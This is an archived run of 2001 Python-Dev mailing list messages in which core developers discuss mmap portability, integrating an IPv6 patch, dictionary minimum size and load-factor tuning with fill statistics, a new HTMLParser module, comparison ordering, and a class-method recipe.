> I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one at home.com Fri May 18 02:29:18 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's out IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?! 
ever-helpful-ly y'rs - tim From jeremy at digicool.com Fri May 18 00:16:15 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one at home.com Fri May 18 05:26:52 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." 
Most interesting to me is that the US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -- therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Fri May 18 06:45:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's our IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are three problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It quickly gets outdated. 3. It touches core aspects of the socket handling that are IMO better untouched. I don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF is actually missing some files).
The third patch should include changes to the C modules, and the last one changes to the standard library modules. For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch has been sitting there since 2000-08-16, making it the oldest open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'd also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fix them, or stay away from CVS while it is being integrated. Regards, Martin From tim at digicool.com Fri May 18 09:17:07 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it .
I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots). Across the test suite, here's the ranking, from most to least popular fill:

     count  fill  %total  cumulative %
    ------  ----  ------  ------------
    146321     1   53.30         53.30
     38200     0   13.91         67.21
     32616     2   11.88         79.09
     29648     3   10.80         89.89
      9884     5    3.60         93.49
      5423     4    1.98         95.47
      2428     6    0.88         96.35
      2016     8    0.73         97.08
      1179     7    0.43         97.51
       904     9    0.33         97.84
       709   103    0.26         98.10
       554    10    0.20         98.30
       513    13    0.19         98.49
       459    12    0.17         98.66
       447    11    0.16         98.82
       364    14    0.13         98.95
       233    15    0.08         99.04
       231    16    0.08         99.12
       193    18    0.07         99.19
       180    17    0.07         99.26
       122    19    0.04         99.30
       107    30    0.04         99.34
       105    21    0.04         99.38
        93    22    0.03         99.41
        93    20    0.03         99.45
        86   256    0.03         99.48
        82    23    0.03         99.51
        80    26    0.03         99.54
        74    24    0.03         99.56
        69    27    0.03         99.59
        64    25    0.02         99.61
        60    29    0.02         99.63
        49    28    0.02         99.65
        44    34    0.02         99.67
        33    32    0.01         99.68
        28    31    0.01         99.69
        27    37    0.01         99.70
        27    33    0.01         99.71
        26    35    0.01         99.72
        24    36    0.01         99.73
        23    39    0.01         99.74
        23    38    0.01         99.75
        21   128    0.01         99.75
        19    44    0.01         99.76
        19    40    0.01         99.77
        17    46    0.01         99.77
        16    48    0.01         99.78
        15    47    0.01         99.78
        14    50    0.01         99.79
        14    42    0.01         99.79

There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full.
That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin . From mal at lemburg.com Fri May 18 09:26:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing.
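Tim's two resize tests can be compared by asking how large a fill each table size tolerates before the test fires. The current test is `mp->ma_fill*3 >= mp->ma_size*2`; the proposed one is `mp->ma_fill*4 > mp->ma_size*3`. This is a plain-Python sketch with hypothetical helper names. It checks only the arithmetic of the two conditions, not probe counts or memory use.

```python
def resize_two_thirds(fill, size):
    """Current test: mp->ma_fill*3 >= mp->ma_size*2."""
    return fill * 3 >= size * 2


def resize_three_quarters(fill, size):
    """Proposed denser test: mp->ma_fill*4 > mp->ma_size*3."""
    return fill * 4 > size * 3


def max_fill(size, needs_resize):
    """Largest fill a table of `size` slots holds without triggering a resize."""
    fill = 0
    while not needs_resize(fill + 1, size):
        fill += 1
    return fill


if __name__ == "__main__":
    print("size  2/3-rule  3/4-rule")
    for size in (4, 8, 16, 32):
        print(f"{size:4d}  {max_fill(size, resize_two_thirds):8d}  "
              f"{max_fill(size, resize_three_quarters):8d}")
```

Under the current test, a 4-slot table holds 2 entries and an 8-slot table holds 5. The 3/4 test lets a fill of 3 stay in 4 slots, which agrees with the figures in Tim's message.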
FYI, I have a patch which inlines small dictionaries directly into the type object (rather than using malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the best performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim at digicool.com Fri May 18 10:32:39 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the best performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling . From mal at lemburg.com Fri May 18 13:36:28 2001 From: mal at lemburg.com (M.-A.
Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 18 13:38:39 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding out performance issues about hot-spots -- there's no such thing as a "typical program", so pybench gives you low level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At least gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it . I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots). 
Across the test suite, here's the ranking, from most to
> least popular fill:
>
>      count  fill  %total  cumulative %
>     ------  ----  ------  ------------
>     146321     1   53.30         53.30
>      38200     0   13.91         67.21
>      32616     2   11.88         79.09
>      29648     3   10.80         89.89
>       9884     5    3.60         93.49
>       5423     4    1.98         95.47
>       2428     6    0.88         96.35
>       2016     8    0.73         97.08
>       1179     7    0.43         97.51
>        904     9    0.33         97.84
>        709   103    0.26         98.10
>        554    10    0.20         98.30
>        513    13    0.19         98.49
>        459    12    0.17         98.66
>        447    11    0.16         98.82
>        364    14    0.13         98.95
>        233    15    0.08         99.04
>        231    16    0.08         99.12
>        193    18    0.07         99.19
>        180    17    0.07         99.26
>        122    19    0.04         99.30
>        107    30    0.04         99.34
>        105    21    0.04         99.38
>         93    22    0.03         99.41
>         93    20    0.03         99.45
>         86   256    0.03         99.48
>         82    23    0.03         99.51
>         80    26    0.03         99.54
>         74    24    0.03         99.56
>         69    27    0.03         99.59
>         64    25    0.02         99.61
>         60    29    0.02         99.63
>         49    28    0.02         99.65
>         44    34    0.02         99.67
>         33    32    0.01         99.68
>         28    31    0.01         99.69
>         27    37    0.01         99.70
>         27    33    0.01         99.71
>         26    35    0.01         99.72
>         24    36    0.01         99.73
>         23    39    0.01         99.74
>         23    38    0.01         99.75
>         21   128    0.01         99.75
>         19    44    0.01         99.76
>         19    40    0.01         99.77
>         17    46    0.01         99.77
>         16    48    0.01         99.78
>         15    47    0.01         99.78
>         14    50    0.01         99.79
>         14    42    0.01         99.79
>
> There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap.

I found that instance dictionaries are usually within the 8 slot range.
You normally have a few heavyweight instances and many lightweight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from > > mp->ma_fill*3 >= mp->ma_size*2 > > to > > mp->ma_fill*4 > mp->ma_size*3 > > That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin . Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 17:05:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
(I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the best performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Fri May 18 17:00:21 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benefit tuples even more than lists or dicts.
At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake at acm.org Fri May 18 17:12:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Fri May 18 17:27:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee? 
:-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Fri May 18 17:36:39 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas at xs4all.net Fri May 18 17:36:42 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benefit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee?
:-) No, after my last meeting, before my first witbier of the friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Fri May 18 17:49:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 18 18:57:34 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. 
:-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 19:37:33 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than using malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido at digicool.com Fri May 18 19:43:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table?
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 20:15:59 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (i.e. it's O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. It's not clear to me though if it would be a win. Assuming that interned strings are the most common key, an association table with four entries would take on average two pointer compares to look up a value. Neil From mal at lemburg.com Fri May 18 20:15:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 20:23:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > It's not clear to me though if it would be a win. Assuming that > interned strings are the most common key, an association table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: http://www.python.org/~guido/) From James_Althoff at i2.com Fri May 18 21:10:11 2001 From: James_Althoff at i2.com (James_Althoff at i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list.
The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim ----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM ----- From: James Althoff, 05/14/01 02:09 PM To: python-list at python.org cc: Subject: Re: Simulating Class (was Re: Does Python have Class methods) Costas writes: >Ok, so after looking thru how Python works and comments from people, I >came up with what I believe may be the best way to implement Class >methods and Class variables. > > > >Costas I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module:
1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class
To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names:
1) SpamMetaClass -- names the enclosing class
2) SpamMeta -- names a singleton instance of the enclosing class
3) Spam -- names the enclosed class
Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass):
    pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).
